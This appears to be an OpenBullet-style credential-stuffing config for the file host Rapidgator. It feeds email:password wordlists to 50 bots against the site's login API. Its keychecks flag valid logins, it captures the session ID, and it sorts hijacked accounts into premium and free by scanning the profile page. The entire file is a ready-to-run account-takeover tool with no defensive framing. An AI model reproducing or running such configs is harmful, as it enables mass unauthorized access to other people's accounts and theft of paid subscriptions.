[SETTINGS]
{
  "Name": "Rapidgator",
  "SuggestedBots": 50,
  "LastModified": "2018-08-19T13:36:08.3455591+00:00",
  "AdditionalInfo": "",
  "Author": "Praveen",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET REQUEST GET "https://rapidgator.net/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#LOGIN REQUEST POST "https://rapidgator.net/api/user/login" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "\"Error: Wrong e-mail or password.\"" 
  KEYCHAIN Success OR 
    KEY "\"session_id\"" 
#SESSION PARSE "<SOURCE>" LR "\"session_id\":\"" "\"" Recursive=FALSE -> VAR "SESSION" "" "" 
#REDIRECT REQUEST POST "https://rapidgator.net/profile/index" AutoRedirect=TRUE 
  CONTENT "session_id=<SESSION>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "premium till" 
    KEY "unlimited<" 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY ">Free<" 
